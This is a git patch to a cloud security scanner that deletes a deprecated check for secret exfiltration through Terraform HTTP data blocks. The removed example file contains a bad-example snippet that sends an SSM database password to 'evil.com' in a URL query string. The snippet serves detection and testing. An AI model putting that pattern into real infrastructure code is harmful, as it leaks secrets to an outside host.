From e60cde373311b0588a52504fe26b2a55a2273f13 Mon Sep 17 00:00:00 2001
From: Nikita Pivkin <nikita.pivkin@smartforce.io>
Date: Tue, 12 Nov 2024 17:07:52 +0600
Subject: [PATCH] chore: remove AVD-AWS-0134

Signed-off-by: Nikita Pivkin <nikita.pivkin@smartforce.io>
---
 .../aws/sns/topic_encryption_with_cmk.go      |  4 +-
 checks/cloud/aws/ssm/avoid_leaks_via_http.go  | 52 -------------------
 .../cloud/aws/ssm/avoid_leaks_via_http.tf.go  | 30 -----------
 3 files changed, 1 insertion(+), 85 deletions(-)
 delete mode 100644 checks/cloud/aws/ssm/avoid_leaks_via_http.go
 delete mode 100644 checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go

diff --git a/checks/cloud/aws/sns/topic_encryption_with_cmk.go b/checks/cloud/aws/sns/topic_encryption_with_cmk.go
index 8b9c27e7..85e020fc 100755
--- a/checks/cloud/aws/sns/topic_encryption_with_cmk.go
+++ b/checks/cloud/aws/sns/topic_encryption_with_cmk.go
@@ -34,9 +34,7 @@ var CheckTopicEncryptionUsesCMK = rules.Register(
 			Links:               cloudFormationTopicEncryptionUsesCMKLinks,
 			RemediationMarkdown: cloudFormationTopicEncryptionUsesCMKRemediationMarkdown,
 		},
-		CustomChecks: scan.CustomChecks{},
-		RegoPackage:  "",
-		Deprecated:   true,
+		Deprecated: true,
 	},
 	func(s *state.State) (results scan.Results) {
 		for _, topic := range s.AWS.SNS.Topics {
diff --git a/checks/cloud/aws/ssm/avoid_leaks_via_http.go b/checks/cloud/aws/ssm/avoid_leaks_via_http.go
deleted file mode 100644
index 02b98b90..00000000
--- a/checks/cloud/aws/ssm/avoid_leaks_via_http.go
+++ /dev/null
@@ -1,52 +0,0 @@
-package ssm
-
-import (
-	"github.com/aquasecurity/trivy-checks/pkg/rules"
-	"github.com/aquasecurity/trivy/pkg/iac/providers"
-	"github.com/aquasecurity/trivy/pkg/iac/scan"
-	"github.com/aquasecurity/trivy/pkg/iac/severity"
-	"github.com/aquasecurity/trivy/pkg/iac/terraform"
-)
-
-var AvoidLeaksViaHTTP = rules.Register(
-	scan.Rule{
-		AVDID:       "AVD-AWS-0134",
-		Provider:    providers.AWSProvider,
-		Service:     "ssm",
-		ShortCode:   "avoid-leaks-via-http",
-		Summary:     "Secrets should not be exfiltrated using Terraform HTTP data blocks",
-		Impact:      "Secrets could be exposed outside of the organisation.",
-		Resolution:  "Remove this potential exfiltration HTTP request.",
-		Explanation: `The data.http block can be used to send secret data outside of the organisation.`,
-		Links: []string{
-			"https://sprocketfox.io/xssfox/2022/02/09/terraformsupply/",
-		},
-		Terraform: &scan.EngineMetadata{
-			GoodExamples:        terraformAvoidLeaksViaHTTPGoodExamples,
-			BadExamples:         terraformAvoidLeaksViaHTTPBadExamples,
-			Links:               terraformAvoidLeaksViaHTTPLinks,
-			RemediationMarkdown: terraformAvoidLeaksViaHTTPRemediationMarkdown,
-		},
-		CustomChecks: scan.CustomChecks{
-			Terraform: &scan.TerraformCustomCheck{
-				RequiredTypes:  []string{"data"},
-				RequiredLabels: []string{"http"},
-				Check: func(block *terraform.Block, module *terraform.Module) (results scan.Results) {
-					attr := block.GetAttribute("url")
-					if attr.IsNil() {
-						return
-					}
-					for _, ref := range attr.AllReferences() {
-						if ref.BlockType().Name() == "resource" && ref.TypeLabel() == "aws_ssm_parameter" {
-							results.Add("Potential exfiltration of secret value detected", block)
-						}
-					}
-					return
-				},
-			},
-		},
-		Severity:   severity.Critical,
-		Deprecated: true,
-	},
-	nil,
-)
diff --git a/checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go b/checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go
deleted file mode 100644
index 87688354..00000000
--- a/checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go
+++ /dev/null
@@ -1,30 +0,0 @@
-package ssm
-
-var terraformAvoidLeaksViaHTTPGoodExamples = []string{
-	`
-resource "aws_ssm_parameter" "db_password" {
-  name = "db_password"
-  type = "SecureString"
-  value = var.db_password
-}
-
- `,
-}
-
-var terraformAvoidLeaksViaHTTPBadExamples = []string{
-	`
-resource "aws_ssm_parameter" "db_password" {
-  name = "db_password"
-  type = "SecureString"
-  value = var.db_password
-}
-
-data "http" "not_exfiltrating_data_honest" {
-  url = "https://evil.com/?p=${aws_ssm_parameter.db_password.value}"
-}
- `,
-}
-
-var terraformAvoidLeaksViaHTTPLinks []string
-
-var terraformAvoidLeaksViaHTTPRemediationMarkdown = ``